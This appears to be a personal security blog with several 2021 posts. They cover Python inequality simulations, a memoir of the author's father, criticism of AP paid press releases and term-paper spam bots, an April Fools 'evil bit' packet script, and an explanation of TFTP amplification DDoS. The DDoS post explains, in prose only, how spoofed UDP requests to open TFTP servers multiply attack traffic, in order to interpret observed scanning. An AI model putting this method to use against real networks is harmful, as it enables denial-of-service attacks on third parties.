I took pains to point out that it was likely an enormous mistake to draw any conclusions based on the similarity of these two graphs.

Then I went ahead and drew conclusions based on the similarity of these two graphs.

I’m like that…

I closed out the blog post by saying this:

All of the inequity in the result of our game arises from a perfectly fair system; in the simulation, the people who win are randomly different every time. Imagine the results if you threw in even the smallest amount of systemic unfairness…

But I can’t just make a sweeping statement like that without… you know… testing it.

So, I did.

Let’s take a look at that first assumption - that the people who win in the original version of the game are just randomly lucky, i.e. that overall, despite the outcome being unfair, the distribution of who wins is fair.

[Note: If you’re not familiar with programming or Python, feel free to just skip the code - it’s simply simulating the game as described above. Any additional information is explained below. I only include the code for folks who want to play around with this stuff on their own…]

#!/usr/bin/env python3
import random
from datetime import datetime

# choose a random seed
random.seed(datetime.now().timestamp())

people = {}
averages = []

# we begin with 1000 people, each with 100 pebbles
for i in range(1000):
    people[i] = 100

# let's play the game 100 times...
for k in range(100):
    # every second, each individual picks a random person and gives them one pebble
    for i in range(3600 * 8):
        for p in range(len(people)):
            r = p
            while(r == p):
                r = random.randint(0, len(people) - 1)
            if people[p] > 0:
                people[p] -= 1
                people[r] += 1
    # let's pull out the values so we can easily sort them...
    values = []
    for p in range(len(people)):
        values.append(people[p])
    # sort the results, lowest to highest
    values.sort()

    count = 0
    sumval = 0
    for p in range(len(people)):
        if people[p] >= 100:
            count += 1
            sumval += p
    print('Run #%3.3i: sum: %i count: %i average: %f' % ((k + 1), sumval, count, (sumval / count)))
    averages.append(sumval / count)
# now, let's do a little statistical math...
avg = sum(averages) / len(averages)
var = sum((x - avg)**2 for x in averages) / len(averages)
std = var**0.5
print('Overall: average:%f variance: %f std_deviation: %f' % (avg, var, std))

I reworked the original game simulation code a bit to run the game in a loop, 100 times. For each run, I pulled out a list of the people who won the game - which I defined as those who ended up with 100 or more pebbles. I calculated the average of their ID Numbers (which ranged from 0 - 999). If the winning group was fairly distributed, the average of those values should have been right around 500 (actually, 499.5, but that’s just me nitpicking…). I gathered the average value for each of the 100 runs, and did a little statistical calculating… averaging all of the averages and calculating their standard deviation. What I found was the following:

average:499.543340 variance: 148.283085 std_deviation: 12.177154

My sample size (100 games) is probably a little small, but overall, it’s showing pretty much what I predicted.

So, what happens if we throw even a tiny bit of systemic unfairness into the mix? What happens if as little as 1% of our population decides that doesn’t like a specific 10% chunk of the population - and refuses to give them a pebble? How might that skew the results?

#!/usr/bin/env python3
import random
from datetime import datetime

# choose a random seed
random.seed(datetime.now().timestamp())

people = {}
averages = []

# we begin with 1000 people, each with 100 pebbles
for i in range(1000):
    people[i] = 100

# let's play the game 100 times...
for k in range(100):
    # every second, each individual picks a random person and gives them one pebble
    for i in range(3600 * 8):
        for p in range(len(people)):
            r = p
            while(r == p):
                if p >= len(people) - (len(people) * 0.01):
                    r = random.randint(len(people) * 0.10, len(people) - 1)
                else:
                    r = random.randint(0, len(people) - 1)
            if people[p] > 0:
                people[p] -= 1
                people[r] += 1
    # let's pull out the values so we can easily sort them...
    values = []
    for p in range(len(people)):
        values.append(people[p])
    # sort the results, lowest to highest
    values.sort()

    count = 0
    sumval = 0
    for p in range(len(people)):
        if people[p] >= 100:
            count += 1
            sumval += p
    print('Run #%3.3i: sum: %i count: %i average: %f' % ((k + 1), sumval, count, (sumval / count)))
    averages.append(sumval / count)
# now, let's do a little statistical math...
avg = sum(averages) / len(averages)
var = sum((x - avg)**2 for x in averages) / len(averages)
std = var**0.5
print('Overall: average:%f variance: %f std_deviation: %f' % (avg, var, std))

This changes the code so that 1% of our population (just ten folks with ID Numbers 990-999) will not give a pebble to a specific 10% of the population (any one of the 100 people with the lowest ID Numbers, down in the range 0-99).

If I’m correct in my assumption that even a small amount of systemic unfairness will skew the result, then the average ID Number of the winning cohort should rise (by forcing some of those people with low ID Numbers out of the winning cohort). But will this small amount of systemic unfairness (only 1% of our population) create a statistically significant change?

Let’s take a look at the overall distribution of pebbles that results from one run of this new 1% systemic unfairness paradigm:

Nothing has changed in the distribution:

• Some people ended up with a crap-tonne of pebbles
• Some people ended up with no pebbles at all

What did change was who got to be in the winners category. Here’s the results for 100 runs:

average:544.126954 variance: 118.185653 std_deviation: 10.871323

Fewer of the folks in the 0-99 range got to be a winner, raising the average ID Number of the winners by 44 points - well beyond the standard deviation of both sets of results, meaning that yes, indeed, this is a statistically significant change.

And, unfortunately, all of this was driven by only 1% of the population.

All of the inequity in the result of our game arises from a perfectly fair system; in the simulation, the people who win are randomly different every time. Imagine the results if you threw in even the smallest amount of systemic unfairness…

Now, there’s no need to imagine.

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
April 26, 2021

I’m not one for really remembering dates all that well. I constantly have to look them up - things like my wedding anniversary. It isn’t that those dates aren’t important to me - they are - but my brain just doesn’t work that way.

When I started writing this post this morning - a story based around a trip we took when I was young - I had a very specific point in mind: I wanted to compare that trip to this past year - The Year of Covid.

Because my father plays an integral part and I wanted to talk about him, I looked up to see when, exactly, he had passed away: April 22, 2011.

Ten years to the day…

Whoa.

Perhaps that’s why he’s been on my mind.

My father was an amazing man in many, many ways. There isn’t a week that goes by when I don’t think about him. There are so many things I miss about him - his easy laughter, his goofy sayings. Whenever anyone would ask him how he was, he would always answer the same way: “Amazing.”

There are so many things that I wish I could show him. So many things that I wish I could tell him.

Did I mention that I miss him?

My dad wasn’t much for vacations. When I was little, we went on very few trips. When he was older, he and my mom traveled more, but big family vacations were a rarity when I was growing up.

At one point - I was probably five or six - my dad took to the notion of setting aside a weekend every so often for a day trip. You know - visiting something that you can travel to, spend some time seeing, and return home from, all in one day. It was strangely out of character for my dad, so of course these trips became the stuff of legend.

One trip in particular stands out in my memory, because it was the genesis of a specific phrase that became part of our family lore. Every family has them - something that someone said or did that everyone remembers and brings up over the years. It’s an important part of the shared family experience.

But, I’m getting ahead of myself…

One weekend, we packed a lunch into the big, green, metal cooler with the white hinged lid and bundled everyone into the car. As was always the case for any lengthy road trip, the cooler was placed on the back seat between my brother and me - a method of staving off the inevitable fussing and outbursts of, “He’s touching me!”

My brother and I were like that.

And so we sat, each in our own little, green-metal-walled enclosure, for what seemed like forever. When you’re five or six, a three-and-a-half hour car ride is interminable. Back then, we didn’t have streaming Internet and Netflix to pass the time like my nine-year-old does today. We just had to “enjoy the scenery,” according to my mother’s instructions.

Five or six year olds don’t enjoy scenery.

In any case, during this interminable, scenery-laced, forever-taking ride, my father was dropping hints about where we were going. It was something that he had read about in one of the Sunday supplements in our local paper, and he apparently had all the skinny on this destination. This whole keeping-where-we’re-going-secret and doling-out-informative-hints thing is something I inherited from my dad. I do/did it to my kids too. I’m sure that it was way more fun for my dad than it was for my brother and me, and it’s just as likely that it was way more fun for me than it is/was for my kids. But hey, that’s life.

They’ll probably do it to their kids too. At least I hope they will…

As I recall, my brother and I were pretty horrible at this guessing game - so eventually my dad just flat-out told us what we were going to see.

The Great Stone Head.

When I think back about this trip, I always think of it as The Great Stone Head - but I’m pretty sure that the word “Great” may be a product of my imagination. I did a little digging on-line, and everything I can find simply references it as The Stone Head. Regardless, I will, forever, refer to it as The Great Stone Head. It’s quite possible that my dad - always one for superlatives - tossed “Great” into the mix to keep my brother and I enthralled.

We weren’t enthralled…

As we continued driving, my father launched into the story of The Great Stone Head.

In 1851, a relatively unknown stone mason named Henry Cross had carved a mile marker in the shape of a head. A small, unincorporated community had grown up around it, taking the name, “Stone Head, Indiana.”

Yep. That’s it. Nothing more to tell…

Back to looking at the scenery.

Time passed. We stopped in a rest area and ate lunch and then climbed back into the car to enjoy more scenery.

The heat-death of the universe came and went.

Still, more time passed.

Finally, we arrived.

Seriously, that’s it. (Today, it even has a Wikipedia entry. A very short Wikipedia entry.)

We stood and we looked - and then we got back in the car and drove home.

There was more than a little tension at the beginning of the car ride back. My dad was tired from the drive. My brother and I were well and truly over scenery. My mom just stared out the window.

Then, there was the obvious disappointment - that creepy face that we’d spent forever driving to see.

That’s when the five or six year old kid - who grew up to be me - said it:

“Well, that was a bummer…”

It was one of those fixed points in space-time - a pivotal moment when everything hung in the balance, and reality could have tipped in either direction.

Then, my dad began to chuckle.

The car ride home was a lot of fun. We sang, we told jokes, we laughed. Somewhere along the way, I fell asleep. When I woke up, we were in the parking lot of a small burger restaurant near home. It was just beginning to get dark, and my dad was waking me up. We rarely went out to eat, so this was an unexpected treat.

When I was thinking about this story, I was going to use it as a metaphor for the past year. It’s been about a year since the whole world got turned upside down, and became… well… a bummer.

The thing is, over the years, as the bummer story was told and re-told, and as our family continued to use that phrase, the meaning of it has shifted a bit. Yes, it still gets trotted out when something turns out to be a disappointment, but disappointment can come in a lot of different flavors.

One of those flavors of disappointment entails spending seven-ish hours in a car, just to see some creepy carved stone head.

But its also a bummer when you’re doing something wonderful and you have to cut it short. Endings are another, sadder flavor of disappointment.

So, this story isn’t going to be about comparing The Year of Covid to The Great Stone Head.

It’s become about something else.

You see, ten years ago today my dad died - and there’s really only one way to describe that:

“Well, that was a bummer…”

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
April 22, 2021

Post Script: Apparently, The Great Stone head had a rather tumultuous time of it after our visit. In 1974, it was stolen, only to be found four months later in an Indianapolis apartment where two teenagers had turned it into a hat rack. It was returned to its rightful place, only to be beheaded in November of 2016. Currently, the whereabouts of the severed head is a mystery.

I swear I had nothing to do with it.

Here is the setup and the rules of the game - don’t worry, they’re not complicated at all:

Setup:

• We’re going to start off the game by gathering 1000 people together.
• We’re going to give each person 100 small pebbles in a cool, stylish drawstring bag. Perhaps it will be monogrammed. Who knows…
• We’re going to set up a timer that will, annoyingly, beep once every second.
• The game will last for 8 hours.

Rules:

1. With every annoying beep of the timer, each person is to - completely randomly - choose another person, and give them a pebble.

That’s it. Nothing more.

We won’t worry about how we’re going to physically place all of these folks in a room so truly random choices can happen. We’re not going to worry about feeding them lunch or giving them breaks. They won’t get bored or tired. This is, after all, an experiment of the mind.

Here’s my question, and I want you to really think about it: at the end of eight hours, what will the distribution of pebbles look like?

Remember: Each person randomly chooses someone else (not themselves) to give a pebble. On every turn, every person in the game gives away one pebble, but - because the choices are truly random, every person has the exact same chance (as every other person) of being the recipient of one or more of the 999 other pebbles that are given away.

What happens?

[Scroll down to see the results]

.

.

.

.

.

.

.

.

.

.

.

So, when I first saw this demonstrated, I was stunned. My gut instinct had been to say, “Well, if everyone is chosen randomly, then everyone should have the same chance of getting a pebble added to their bag. Pebbles should end up being fairly evenly distributed…” I’m pretty sure if you’ve never seen this demonstrated before, you likely thought the same thing.

I couldn’t believe the results (click on the picture to expand):

That’s not just an isolated run. Every time this game is played, that’s the resulting distribution of pebbles. Some people end up with a crazy number of pebbles. Some people end up with none. The overall number of pebble held by the top few people changes… sometimes the bottom end people have a few more or less pebbles, but that’s the distribution. Every. Damned. Time.

If you want to play around, here’s some Python code that I used to simulate this simple game:

#!/usr/bin/env python3
import matplotlib.pyplot as plt
import random
from datetime import datetime

# choose a random seed
random.seed(datetime.now().timestamp())

people = []

# we begin with 1000 people, each with 100 pebbles
for i in range(1000):
	people.append(100)

# every second, each individual picks a random person and gives them one pebble
for i in range(3600 * 8):
	for p in range(len(people)):
		r = random.randint(0,len(people) - 1)
		# Thou shalt not choose thyself...
		while r == p:
			r = random.randint(0,len(people) - 1)
		# if they've got a pebble to give, give it
		if people[p] > 0:
			people[p] -= 1
			people[r] += 1

# sort the results, lowest to highest
people.sort()

#plot the results
fig, ax = plt.subplots()
ax.plot(people)
ax.set(xlabel='Individuals', ylabel='Pebbles')
fig.tight_layout()
plt.show()

[You’ll need matplotlib installed to make the pretty graph…]

Here’s the thing: this is about as simple a game as you can imagine. There’s really only one rule. Theoretically, it’s about as fair a game as can be made - all of the choices involved are truly fair and random.

It’s just that the end results are anything but fair…

I have a couple of take-aways from this game:

• We’re really, REALLY bad at understanding the outcome of even brain-dead simple rule systems.
• There’s something fundamental going on here. If this is the distribution every time, something interesting is driving it.

I couldn’t help but draw a parallel between the graph resulting from this simple game, and this graph (click on the picture to expand):

This graph shows U.S. Household Income by Percentile for 2020. The data comes from IPMS CPS and is 1999 data adjusted to 2020 dollar values using CPI data.

I’m not saying that there are any conclusions that can be drawn from the fact that those two graphs look remarkably similar - in fact, I’ll go so far as to say that such conclusions would likely be invalid in any number of ways. All of that aside, however, this does have me thinking about many, many things.

When a simple, stupid game involving the truly random movement of pebbles can mimic the broader inequities found in our society - you really need to pause and reflect on life.

What I will say is this. The spoken and unspoken rules that drive the data that makes up that second graph are far more complex, far more entangled, and far more difficult to understand than the single rule that drives the data resulting from our game - and most if not all of you were unable to predict the results of that single, simple rule.

Many people right now are so sure that they understand the rules that describe our social and economic world - they understand the implicit and explicit mechanisms that drive who fails and who succeeds, and yet I’m pretty positive they don’t - especially if they’re the ones with a bag full of pebbles.

I’m absolutely not claiming to understand anything much about the stated and unstated rules in this world. I’ll even categorically state that I don’t understand those rules. But I will say this: there’s a whole lot of randomness to who wins and who loses in life. Far more randomness than most people are comfortable accepting.

All of the inequity in the result of our game arises from a perfectly fair system; in the simulation, the people who win are randomly different every time. Imagine the results if you threw in even the smallest amount of systemic unfairness…

Try to remember that, and try to be kind.

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
April 19, 2021

I talk about all kinds of things… but, generally speaking, pretty much all of this stuff is, at the very least, security adjacent.

For some time now, I’ve been going on about the Associated Press. I’m deeply dismayed that the AP is selling legitimacy (via the AP brand) to organizations whose products are, shall we say, the tiniest bit questionable. For a fee, the Associated Press ("Since 1846, AP has done more than any organization in the world to expand the reach of factual reporting", according to AP President and CEO Gary Pruitt) will place a press release on their site that says… well… as far as I can tell, pretty much whatever you want it to say.

You read that right: it seems if some PR flack tosses it to the AP, they print it - editorial oversight, facts, and journalistic ethics be damned.

How else can you explain the cavalcade of skeevy, questionable advertisements masquerading as press releases that populate the AP’s website? There are psychics. There are herbal supplements targeted to treat everything from herpes to tinnitus - some even claiming to providing male enhancement. There are Canadian pharmacies. Finally, there are - my personal favorites - the essay / research paper writing services. (You know… Plagiarism ᴙ Us)

Personally, I’m outraged. Unfortunately, I seem to be the only one… This issue seems to be failing to gain much traction with my audience.

That’s my fault.

Psychics, term papers, and dietary supplements designed to fix those nasty herpes breakouts may be a bit outré for this crowd. I needed to find something to bring this story home, something that would make this concept relevant for the security folks who read this blog.

Oh man… did I find it.

Even if you can’t bring yourself to whip up a little righteous indignation over the Associated Press auctioning its reputation to skeevy term paper peddlers, maybe you’ll still find this a little triggering:

The Associated Press, “always committed to the highest standards of objective, accurate journalism”, winner of 54 Pulitzer Prizes (okay, a lot of those are for takin’ pictures, but still…) is hosting paid content for Crown Sterling.

[So… let’s play a little game: only one of the links in the following paragraph is not a paid press release on the Associated Press website. Without hovering over them and checking, can you guess which one is an actual news article?]

Crown Sterling is a company that sells “the world’s first dynamic ‘non-factor’ based quantum AI encryption software”, “[u]tilizing multi-dimensional encryption technology, including time, music’s infinite variability, artificial intelligence, and most notably mathematical constancies to generate entangled key pairs.” They know they’ve got something special. So special, in fact, that when they were roundly heckled during their Black Hat presentation (even though they believe they totally made the case for how special they are) they attempted to sue the people the people who booed them and the venue at which they were booed.

[Did you guess correctly?]

So, what’s it going to take? Crown Sterling is consistently derided by those in the security community. Seriously. The problem is, they talk a good game and throw around enough techno/crypto terms to fill your buzzword bingo card in one go.

That’s where the Associated Press and other folks willingly taking cash to publish whatever chum Crown Sterling’s PR machine spews out comes into play.

Selling technology, especially cryptography, should be based on technical merit. It’s far too easy for non-technical folks to fall for Crown Sterling’s schtick. Having their buzzword-dense press releases given credence by placement on the website of a company who claims “170 years [of commitment] to the highest standards of objective, accurate journalism” is a huge problem. Especially when, after 170 years, that company seems unwilling to exercise any editorial control over the press releases they get paid to publish.

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
April 19, 2021

Tweet about the deadline you’re facing on an essay or research paper, and you’ll get responses from all sorts of folks willing to assist you with your homework.

Ambulance chasing at its finest.

Shortly after I first discovered this phenomenon, I found myself thinking, “Why should the bad guys have all the fun?”

If these scummy, border-line legitimate businesses can create their own plagiarism-promotion Twitter-bots (that use all too predictable phraseology) and attempt to persuade students to abandon their academic integrity, what’s to keep someone from creating a Twitter-bot designed to promote an alternative message? And what’s to prevent that Twitter-bot from targeting the exact tweets that the term-paper-promotion bots target?

The only problem would be finding a stunningly handsome and devastatingly brilliant person who would be willing and able to create something like that… in, as it turns out, only a couple of hours.

While it still needs a little improvement^*, I give you the anti-plagiarism Twitter bot:

I’ll gladly entertain suggestions for better wording on the messages it sends.

Here it is in all of it’s glory, responding amidst a torrent of term-paper Twitter-spam.

[Because I redacted them all, I counted - so you don’t have to: there were 24 scummy responses]

Hey, term-paper pushers: it sucks to be hoisted by your own petard, doesn’t it?

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
March 18, 2021

[Update #1: It took me all of 5 minutes to make the fix I talk about down there in the footnote with the asterisk. What can I say? I’m good… Unfortunately, I was too tired last night to think in any depth about it. Back online!]

[Update #2: Yes, I know that this represents a tiny drop in a great ocean full of Internet Menace. I acknowledge that. All I can say is: it makes me feel better.]

^*There's one issue I need to figure out how to fix:

I had a lovely conversation with a couple of K-pop stans who clued me in on some behavior that wasn’t making sense (I was seeing several totally unrelated mentions of “essay” in replies an odd variety of tweets). It seems that the youngsters have figured out how to use the essay Twitter-bots to their advantage - because they tend to both like and reply to tweets about essays:

While I applaud their ingenuity, I don’t want my bot to be dragged into that sort of use. I’m pretty sure I know how to fix this issue (and I also have some improvements planned…) but for now, I’ve taken it off-line until I can implement the changes.

Don’t get me wrong. I think that Twitter has its good points. It’s just that I’m not sure that they outweigh the scum and villainy that you encounter there.

Sometimes, I get a little bored. Most people would watch a movie or read a book.

I mess with Internet idiots.

The idiots du jour are (once again) my buddies profiting from academic dishonesty by selling term / research paper writing services.

To bring you up-to-date, thus far I’ve:

• Chronicled the magical happenstance of links to term paper service storefronts somehow appearing on hacked sites, creating a search engine boost for their sales.
• Written extensively on how these same skeevy term paper services are rehabilitating their reputations (and boosting their search engine position) by paying a PR firm to place press releases on the site of the Associated Press.

Yesterday’s adventure was based on some Twitter searchin’ that I’ve been doing. You see, I’m more than a little bit peeved about this whole Associated Press thing, and I’m trying to figure out some way to get it the attention that I think it deserves. I really want to find a way to hold the AP’s feet to the fire to get them to cut this crap out. (Seriously, if anyone has a notion on how to make that to happen, please let me know…)

Anyway, one of the things that I noticed when I was doing Twitter searches for academic integrity was an odd response. Someone was responding to a Tweet by saying something like, “That could get me an academic integrity violation.” Obviously, that was too intriguing to pass up, so I dug into the conversation to see what was going on.

What I found was appalling.

A college student, facing an impending deadline for a paper had simply been venting. This young lady said something akin to “I’ve been procrastinating about starting the big research paper I have due in two weeks.” Based on the timestamps on the tweets, it took less than 5 minutes for her to receive a response from what appeared to be a Twitter bot associated with some a skeevy research paper service. They were offering to produce a paper for her.

If that young lady could accidentally trigger a response, what if I tried to trigger me some bots.

So, I tweeted:

I timed it.

I’m just that way…

It took 47 seconds for the first response to hit… Then another, and another, and another, and another, and… All in all, I received 8 responses:

I received responses from Assignment Help (@Assignment204), ParagonWriters (@WritersParagon), Academia Pro (@_Academia_PRO), Elena essays (@ElenaEssays), Isabell_Writer Pro (@isabellchloe95), Essay Writing Services (@Essaywritin_USA), Premium Academic Writers (@premiumwriters5), and OXFORD WRITERS (@oxfordwritr).

Obviously, any organization that just pops up when you mention something on Twitter is probably not the place to spend money, just sayin’… But, you gotta figure that these folks represent the crème de la crème of the term paper writing service industry, because what says fine, upstanding company quite like a business model that includes sniping keywords on Twitter? Unfortunately, the fact that they continue down this sleezy path means that they’ve likely bagged more than a few academically struggling college students this way.

The brazenness of these clowns seems to be unlimited - they facilitate academic dishonesty, get SEO benefit from hacked websites, and use the Associated Press to legitimize their utterly illegitimate businesses. It’s like they’re pond scum with Satan’s marketing team.

So… I’ve decided I need to do something about it.

I’m not saying what I’m going to do - yet - but trust me, it’s going to be fun.

Developing code to use the Twitter API is actually relatively easy - the hardest thing seems to be keeping up with overall ambiguity that seems to constantly swirl around Twitter’s developer program. I’ve had what I thought was a developer account for years. In that account, I even have apps listed (for a long time, I ran a honeypot that I wrote that tweeted whenever it was attacked). I have keys. I have secrets… the whole nine yards. But when I went to use Twitter’s streaming API, apparently I have some sort of old fashioned developer account and I can’t be trusted with the full power of the Twitter API. Twitter has been pulling this stuff for years: changing the rules in the middle of the game.

So I’ve applied for a new-fangled developer account… We’ll just have to wait and see what happens.

Keep checking back - I’ve got something interesting in mind…

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
April 12, 2021

TFTP? What’s up with that?

[Note: I love me some python + matplotlib. Just sayin’…]

TFTP, or Trivial File Transfer Protocol, is a simple high-level protocol for transferring data. It is often used to boot or configure diskless workstations, X-terminals, and routers. TFTP sends information using the User Data Protocol (UDP) and generally runs on port 69/UDP.

Generally, there’s not a lot of call for TFTP to ever be open on the big, bad Internet. There’s no concept of login; no usernames, no passwords. It’s as insecure protocols come.

So, given that Internet-available TFTP servers should be as rare as hen’s teeth, what the heck is going on with the sudden spike in packets directed to 69/UDP?

When you’re confused by something that you’re seeing on the Internet, it helps to remember what I will, henceforth, be referring to as Liston’s Two Laws of the Conservation of Packets:

1) Packets don't lie.
2) Bad guys never do things for no reason.

If the ‘Net baddies are slinging packets, there’s always a reason. It may be a stoopid reason - but there’s always a reason.

Let’s take a look at the packets. Essentially, with the exception of the source IP, they’re all the same. This is absolutely some kind of tool. Here’s an example packet (grabbed from one of my ‘Net sensors) that shows us pretty much everything we need to see.

If you’re not familiar with the packet-level workings of TFTP, let me ‘splain. This is a TFTP read request (an RRQ in TFTP-speak) … pretty much the TFTP equivalent of an HTTP GET request. It’s, essentially, saying, “Hey, can you please give me the file named ‘x’?” If there were a TFTP server hanging out on this system, it would dutifully check to see if it had a file named “x”, and if it did, it would begin sending it. Otherwise, it would send back the equivalent of a “file not found” message.

TFTP is a pretty brain-dead protocol. As I’ve already said, there’s no concept of authentication; no usernames, no passwords. You can’t list a directory using TFTP… you basically need to know the filename you’re looking to grab in advance. This simplicity makes client code small and easy to write / integrate into low powered devices to use to grab a specifically named configuration file on boot.

So I’ll ask again: TFTP? What’s up with that?

I’m sorry. I can’t hear you. Please speak up!

Amplification is the name of the game…

Let’s say you’re a skeevy bot-herder and you’re looking to make some bank by performing a DDoS attack for hire. You’ve 0wned enough systems that your bots can generate around 200 Mbps of traffic. While that’s probably enough to knock one of your gaming buddies off the net when he’s camping on a spawn point, it’s not really DDoS-for-hire material.

But what if you could find a way to turn your 200 Mbps into a much bigger stream of data? What if you could multiply the size of your DDoS traffic? What if that amplification was, essentially, free?

Here’s what you need to do that:

• You need some way to send a single, relatively small packet and get back a MUCH bigger response.
• You need to be able to impersonate your DDoS target so that the response will go to them, rather than back to you.

Hello TFTP…

Because TFTP runs over a connectionless protocol (UDP), you can easily impersonate your target system. You simply send a UDP packet with a faked source address to a TFTP server, and it’ll happily respond back to the system from which it thinks the packet came. Better still, if you can find a real, live, Internet-accessible TFTP server, its response will be appreciably bigger than the packet you send… somewhere on the order of 30 - 100 times bigger.

That’ll turn your 200 Mbps into 6 Gbps - 20 Gbps, and that’s not too shabby.

But now, you’ve got one more problem… finding a TFTP server, UDP is a notoriously difficult protocol to use for a port scan. Ask anyone who’s ever done it about the joys of UDP scanning, and they’ll give you a pained expression and walk away shaking their heads.

Seriously. Go find someone right now and try it. I’ll wait…

I was right, wasn’t I?

If you are doing a UDP scan for targets, then you’re probably just looking for systems that don’t respond with some sort of ICMP unreachable error and calling it a win. When you find one of those, you’ll be painting that sucker with all the UDP-source-impersonating-TFTP-RRQ-love you can muster. Thus the spike seen above.

One of the downsides of monitoring Internet traffic for all kinds of badness is that whenever you see something shady like this going on, you’re left wondering, “Is it me, or is it everyone?” I don’t know. I’m seeing this on one system, but I don’t know just how widespread it may be.

TFTP? What’s up with that?

I’ll tell you what’s up with that:

If the bad guys can find themselves enough TFTP servers that have been left open on the Internet, then they can use the combined bandwidth of those TFTP servers to wreak all kinds of havoc.

So, even though the likelihood of finding one is low, let’s just say that the value of a TFTP server - if found - isn’t so very… well… TRIVIAL.

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
April 9, 2021

It was one of those compromises. One of the ones that, for whatever reason, I can’t quite get out of my head. One of those where I keep beating the bushes, trying to get someone to pay attention and get the thing cleaned up.

It took a few attempts, calling, sending email to everyone in IT, but eventually I got someone’s attention and a promise that they were working to get their website fixed.

A week or two passed.

As I often do, I went back to take a look - just to see if any progress was being made.

Sure enough, they had actually removed a wide swath of compromised pages.

Things were looking better.

Then I looked at one of their subdomains.

It was still compromised - still flogging term papers, performing SEO for academic dishonesty.

I emailed them again, figuring that they simply had missed this one portion of their infrastructure.

They responded almost immediately this time. They were aware that their site was still compromised.

And then, these IT professionals said one last thing: they had contracted to have a company come in and rework the PHP backend of their site to eliminate the issue.

Oh… I almost forgot one tiny, important detail: It’s a frickin’ WordPress site.

Uh…

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
April 7, 2021

Why are you ignoring me?

I’ve sent you multiple messages through your website. I’ve pinged you several times on Twitter, and I’ve done it at times when I can watch you answering other tweets - blathering about inanities, sending messages of support, chattering about anything and nothing.

I’ve become convinced that it’s impossible for you to have NOT seen my messages.

“Your website is compromised.”

At times, I’ve been polite.

At other times, I’ve been a little rude.

I’ve given you simple Google searches to try.

I’ve done those Google searches for you and I’ve sent you screenshots of the results.

Heck, I’ve even sent you a screenshot of your compromised site.

I know you’ve seen my messages and yet you choose to ignore me.

Why do I care more about all of this than you do?

It’s a question I’ve asked myself over and over. I’ve been doing this thankless task for something like 20 years now… since back in 2001 when I first started running the prototype of what would, eventually, become LaBrea. I’ve been contacting people to tell them that they’ve been 0wned.

“You have a compromised system.”

“Someone has hacked your website.”

I’ve said those words many, many times.

From LaBrea, to honeypots, to Google searches, to neat little toyz I’ve purpose-built to monitor attacks - I’ve used a bunch of different tools over the years, and I’ve found lots of compromised stuff. I’ve made phone calls, sent emails, Facebook messages, and tweets.

I’ve been ignored more times than I can count.

Every time I’m ignored, I hear this voice in the back of my mind whispering: “Why do I care more about all of this than you do?”

It bothers me.

Seeing someone use their intelligence to take advantage of other people truly bothers me.

It bothers me to the point that seeing it makes me need to reverse it. To fix it.

But why?

I’m a strong believer that philosophical anger and moral outrage are often a reflection of the weaknesses we fear the most in ourselves.

While this isn’t a hard and fast rule, it tends to be pretty accurate. Moral indignation tends to stem more from furtive fascination than from true disgust. As H.G. Wells famously said, “Moral indignation is jealousy with a halo.”

Show me someone who is righteously indignant about any thing - drugs, pornography, gambling, websites being hacked - and I’ll show you someone who, deep down inside, is afraid that they could, under the proper circumstances, have a problem with that thing.

In the security industry, it’s something of an open secret - we talk about it all the time: The Line.

“What would it take to make you cross… The Line?”

In most industries the seduction of the dark side isn’t nearly so omnipresent. In security, it tends to be in your face on a day-to-day basis. We all see the hacks, and unless you’re… well… dead, you’ve probably thought - on more than one occasion, “Damn… I could’ve pulled that off…”

I have. (And, me being me, I’ve also thought… “Damn, I would’ve done a much better job…”)

We talk about The Line, because The Line fascinates us - and that fascination terrifies us.

We talk about The Line, because The Line drives us to feel it: jealousy with a halo.

We talk about The Line, to keep ourselves firmly planted on this side of it.

And, some of us need to throw on an imaginary mask and cape and run around trying to save the world one website at a time - just to keep ourselves far away from The Line.

And we just wish you would answer our frickin’ emails…

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
April 5, 2021

It’s a little something that I put together for today. Seems appropriate…

Please let me know what you think it does.

#!/usr/bin/env python3
# this python script MUST be run as root

# also, once this is running, it is necessary to run the
# following iptables command designating the appropriate device:
# iptables -A OUTPUT -o <device> -j NFQUEUE --queue-num 3514

from scapy.all import *
from netfilterqueue import NetfilterQueue

def doIt(packet):
	scapypkt = IP(packet.get_payload())
	scapypkt[IP].flags |= 4
	del scapypkt[IP].chksum
	packet.set_payload(bytes(scapypkt))
	packet.accept()

# bind the callback function to the queue
nfqueue = NetfilterQueue()
nfqueue.bind(3514, doIt)

try:
	nfqueue.run()
except KeyboardInterrupt:
	pass

XOXOXO

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
April 1, 2021

P.S.: It’s probably NOT the best idea to actually do this for all of your network traffic. I tested it by adding -p ICMP to the iptables command, and it actually works and does a fine job… That being said, I take NO responsibility.

P.P.S.: I finally gave into temptation and I’ve been running it on all traffic for quite a while now. I even pushed this update to the site just now with it running. It’s working like a charm - color me impressed.

Hint #1:

echo 'VGhlIG51bWJlciAzNTE0IGlzIGludm9sdmVkIGluIGFsbCBvZiB0aGlzIHNvbWVob3cuCg==' | base64 -d

Hint #2:

echo 'VGhpcyBoYXMgc29tZXRoaW5nIHRvIGRvIHdpdGggYSBnZW50bGVtYW4gbmFtZWQgU3RldmUgQmVsbG92aW4uCg==' | base64 -d

